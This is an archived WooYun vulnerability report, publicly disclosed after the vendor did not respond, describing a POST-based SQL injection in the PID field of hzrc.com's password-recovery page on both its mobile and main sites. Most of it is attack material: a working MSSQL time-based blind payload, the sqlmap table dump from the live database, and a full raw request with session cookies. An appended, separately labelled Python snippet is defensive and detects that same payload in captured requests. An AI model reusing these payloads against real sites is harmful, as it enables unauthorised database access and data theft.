WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-09-23: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly. 2014-11-07: The vendor has chosen to ignore the vulnerability; details are now disclosed to the public.
Hangzhou Talent Network (hzrc.com) mobile site: POST-based SQL injection
http://3g.hzrc.com/Qz/PGetPassWord.aspx
Injection parameter: PID
Parameter: PID
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTc4NDQ1OTY1OGRk0D8rA/ICqoNK17bQjSqqyFTO ZA=&PID=aaaaa' WAITFOR DELAY '0:0:5'--&SubmitMain=%CC%E1 %BD%BB
Table names can be brute-forced #1
Current database [8 tables]
+----------------+
| Market         |
| adblocks       |
| autorizacaonfe |
| binn_sprav     |
| comp_group     |
| object         |
| pc             |
| typecompte     |
+----------------+
#2
The main site is also affected: http://www.hzrc.com/qz/PGetPassword.aspx
------------------Main site---------------------------------------
POST /Qz/PGetPassWord.aspx HTTP/1.1
Host: www.hzrc.com
Proxy-Connection: keep-alive
Content-Length: 303
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.hzrc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hzrc.com/Qz/PGetPassWord.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: __utma=1.1810421980.1411273058.1411273058.1411273058.1; __utmz=1.1411273058.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=aeyqkk45kb0umrybbztiqo55; NetType=TEL; UniqueV=C968D57A27108FD2338845AB; vConfirm=#MC_summit; CNZZDATA2145298=cnzz_eid%3D2002817278-1411268720-http%253A%252F%252Fz7.cc%252F%26ntime%3D1411375294

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTE3NzAzMzUzNg9kFgICAQ9kFgICBg9kFgRmDxYCHgRUZXh0ZWQCBA8WAh8AZWRk%2FWmhYjK8LPtq%2FrrkPVF6G2mBk7E%3D&__VIEWSTATEGENERATOR=3E4BC614&PID=aaaaa%27&SubmitMain=%CC%E1+%BD%BB&Left%3ALoginName_=&Left%3APassWord_=&KJs=8&Left%3AUniqueV=C968D57A27108FD2338845AB
Current database [104 tables]
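Added example, not part of the original report: a small triage check a defender can run over captured requests of the shape shown above. It parses the form body and flags any field carrying the MSSQL WAITFOR DELAY payload from the sqlmap output, a trailing SQL comment terminator, or an unbalanced single quote (the bare %27 probe in the main-site request). The sample request is constructed from the report's fields and shortened; the indicator names are this example's own.

```python
import re
from urllib.parse import parse_qs

# Indicators matching what this report shows: the MSSQL time-based payload,
# the "--" comment terminator that closes it, and the lone-quote probe.
INDICATORS = [
    ("mssql_time_delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.IGNORECASE)),
    ("sql_comment_terminator", re.compile(r"--\s*$")),
    # odd number of single quotes: zero or more quote pairs, then one extra
    ("unbalanced_single_quote", re.compile(r"^[^']*(?:'[^']*'[^']*)*'[^']*$")),
]


def form_fields(raw_request: str) -> dict:
    """Return the URL-decoded form fields from a raw HTTP request."""
    head, _, body = raw_request.partition("\r\n\r\n")
    if not body:  # tolerate captures that use bare LF line endings
        head, _, body = raw_request.partition("\n\n")
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_request(raw_request: str) -> dict:
    """Map each suspicious form field to the list of indicators it matched."""
    findings = {}
    for name, value in form_fields(raw_request).items():
        hits = [label for label, rx in INDICATORS if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


# Constructed sample: the main-site POST from this report, reduced to the
# relevant fields, with PID carrying the payload from the sqlmap output.
SAMPLE_INJECTED = (
    "POST /Qz/PGetPassWord.aspx HTTP/1.1\r\n"
    "Host: www.hzrc.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUK"
    "&PID=aaaaa%27+WAITFOR+DELAY+%270%3A0%3A5%27--&SubmitMain=%CC%E1+%BD%BB"
)
# Same request with an ordinary value in PID, for comparison.
SAMPLE_BENIGN = SAMPLE_INJECTED.replace(
    "aaaaa%27+WAITFOR+DELAY+%270%3A0%3A5%27--", "12345")

if __name__ == "__main__":
    print(flag_request(SAMPLE_INJECTED))  # only PID is reported
    print(flag_request(SAMPLE_BENIGN))    # {}
```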
Unable to contact the vendor, or the vendor actively refused.